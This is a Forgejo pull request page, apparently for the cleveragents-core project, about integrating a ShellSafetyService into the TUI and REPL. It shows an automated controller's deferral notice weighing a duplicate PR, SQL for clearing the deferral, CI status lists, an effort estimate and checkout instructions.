Preserved value (when applicable): If #11112 is determined to be more complete: both PRs solve issue #4736 by wiring ShellSafetyService; #11112 may represent a more comprehensive refactor (larger diff, fewer files) while #10890 is more conservative (smaller diff, broader reach across 5 files). If #10890 is more complete: its explicit TDD test coverage and multiple file changes suggest more thorough testing and broader impact. Recommend checking: (1) CI status of both, (2) test coverage differences, (3) implementation approach (identical vs different solutions).

To clear the deferral (SQL):
UPDATE workflows SET deferred_reason=NULL,
deferred_at=NULL,
deferred_target_workflow_id=NULL
WHERE workflow_id = 361;

INSERT INTO controller_events
  (workflow_id, ts, event_type, payload, cause, forgejo_write_pending, replay_attempts)
VALUES (361, datetime('now'), 'deferral_cleared',
        json_object('cleared_by', 'operator', 'reason', '<your reason>'),
        'operator', 0, 0);

Audit ID: 88314

Automated by the CleverAgents controller pipeline.
Identity: HAL9000 (pipeline action)

[CONTROLLER-DEFER:Gate 1:needs_evaluation] This PR has been deferred for re-evaluation. The controller has stepped back from processing it. To resume, a human or scope-evaluator must clear the deferral flag AND re-add the auto/sentinel label. Decision: - Gate: Gate 1 - Reason category: needs_evaluation - Canonical: #- - LLM confidence: medium - LLM reasoning: PR #10890 and #11112 have identical titles and both close issue #4736, solving the same shell safety problem. #11112's branch name "fix/pr-10890-shell-safety-integration" confirms topical overlap. #10890 explicitly documents 8 TDD regression scenarios (quality signal), while #11112 has 4x more additions but fewer files touched (534 add/16 del across 3 files vs 129 add/41 del across 5 files). Without full PR bodies and CI status, it's unclear which is more complete or whether they represent different implementation approaches to the same fix. - Preserved value (when applicable): If #11112 is determined to be more complete: both PRs solve issue #4736 by wiring ShellSafetyService; #11112 may represent a more comprehensive refactor (larger diff, fewer files) while #10890 is more conservative (smaller diff, broader reach across 5 files). If #10890 is more complete: its explicit TDD test coverage and multiple file changes suggest more thorough testing and broader impact. Recommend checking: (1) CI status of both, (2) test coverage differences, (3) implementation approach (identical vs different solutions). To clear the deferral (SQL): UPDATE workflows SET deferred_reason=NULL, deferred_at=NULL, deferred_target_workflow_id=NULL WHERE workflow_id = 361; INSERT INTO controller_events (workflow_id, ts, event_type, payload, cause, forgejo_write_pending, replay_attempts) VALUES (361, datetime('now'), 'deferral_cleared', json_object('cleared_by', 'operator', 'reason', '<your reason>'), 'operator', 0, 0); Audit ID: 88314 --- Automated by the CleverAgents controller pipeline. Identity: HAL9000 (pipeline action)

HAL9000 added the auto/needs-reevaluation

State

Paused

labels 2026-06-07 02:40:40 +00:00

drew referenced this issue from a commit

2026-06-11 00:22:18 +00:00

ci: stop master workflow on PR updates

drew added 1 commit 2026-06-11 00:22:18 +00:00

ci: stop master workflow on PR updates

CI / lint (pull_request) Has been cancelled

Details

CI / typecheck (pull_request) Has been cancelled

Details

CI / security (pull_request) Has been cancelled

Details

CI / quality (pull_request) Has been cancelled

Details

CI / unit_tests (pull_request) Has been cancelled

Details

CI / integration_tests (pull_request) Has been cancelled

Details

CI / e2e_tests (pull_request) Has been cancelled

Details

CI / coverage (pull_request) Has been cancelled

Details

CI / build (pull_request) Has been cancelled

Details

CI / docker (pull_request) Has been cancelled

Details

CI / helm (pull_request) Has been cancelled

Details

CI / push-validation (pull_request) Has been cancelled

Details

CI / status-check (pull_request) Has been cancelled

Details

fbcf25ada7

Remove the stale pull_request trigger from master.yml so PR branch commits do not launch the master workflow.

Maintenance patch for PR #10890.

HAL9000 referenced this pull request

2026-06-14 19:37:14 +00:00

fix(tui): integrate ShellSafetyService properly in TUI app #6576

HAL9000 referenced this pull request

2026-06-15 11:19:35 +00:00

fix(tui): integrate ShellSafetyService properly in TUI app #6576

HAL9000 referenced this pull request

2026-06-17 03:04:23 +00:00

fix(tui): integrate ShellSafetyService properly in TUI app #6576

HAL9000 added 1 commit 2026-06-18 15:01:28 +00:00

chore: re-trigger CI [controller]

CI / typecheck (pull_request) Has been cancelled

Details

CI / security (pull_request) Has been cancelled

Details

CI / quality (pull_request) Has been cancelled

Details

CI / unit_tests (pull_request) Has been cancelled

Details

CI / integration_tests (pull_request) Has been cancelled

Details

CI / e2e_tests (pull_request) Has been cancelled

Details

CI / build (pull_request) Has been cancelled

Details

CI / helm (pull_request) Has been cancelled

Details

CI / push-validation (pull_request) Has been cancelled

Details

CI / lint (pull_request) Failing after 57s

Details

CI / coverage (pull_request) Has been skipped

Details

CI / docker (pull_request) Has been skipped

Details

CI / status-check (pull_request) Failing after 3s

Details

c1c1f798cb

HAL9000 removed the

State

Paused

label 2026-06-18 15:15:51 +00:00

HAL9000 commented

2026-06-19 07:39:42 +00:00

📋 Estimate: tier 1.

Multi-file cross-subsystem change: replaces a legacy inline safety function with a service dependency across both the TUI input layer (shell_exec.py) and CLI commands layer (repl.py), while preserving backward-compatible callback API. BDD feature file gets 8 new TDD regression scenarios plus updated step definitions — non-trivial test burden. All 13 CI gates are failing, indicating the current implementation has real errors requiring diagnosis and correction across lint, typecheck, and test layers. Requires cross-file context to understand ShellSafetyService API, callback contract, and integration pattern. Standard engineering work at tier 1; not architecturally complex enough for tier 2.

**📋 Estimate: tier 1.** Multi-file cross-subsystem change: replaces a legacy inline safety function with a service dependency across both the TUI input layer (shell_exec.py) and CLI commands layer (repl.py), while preserving backward-compatible callback API. BDD feature file gets 8 new TDD regression scenarios plus updated step definitions — non-trivial test burden. All 13 CI gates are failing, indicating the current implementation has real errors requiring diagnosis and correction across lint, typecheck, and test layers. Requires cross-file context to understand ShellSafetyService API, callback contract, and integration pattern. Standard engineering work at tier 1; not architecturally complex enough for tier 2.

CI / typecheck (pull_request) Has been cancelled

Required

Details

CI / security (pull_request) Has been cancelled

Required

Details

CI / quality (pull_request) Has been cancelled

Required

Details

CI / unit_tests (pull_request) Has been cancelled

Required

Details

CI / integration_tests (pull_request) Has been cancelled

Required

Details

CI / e2e_tests (pull_request) Has been cancelled

Details

CI / build (pull_request) Has been cancelled

Required

Details

CI / helm (pull_request) Has been cancelled

Details

CI / push-validation (pull_request) Has been cancelled

Details

CI / lint (pull_request) Failing after 57s

Required

Details

CI / coverage (pull_request) Has been skipped

Required

Details

CI / docker (pull_request) Has been skipped

Required

Details

CI / status-check (pull_request) Failing after 3s

Details

This pull request has changes conflicting with the target branch.

src/cleveragents/tui/input/shell_exec.py

View command line instructions

Checkout

From your project repository, check out a new branch and test the changes.

git fetch -u origin bugfix/m8-shell-safety-service-integration:bugfix/m8-shell-safety-service-integration

git checkout bugfix/m8-shell-safety-service-integration

Sign in to join this conversation.

3 Participants

Notifications

Due Date

No due date set.

Dependencies

No dependencies set.

Reference: cleveragents/cleveragents-core#10890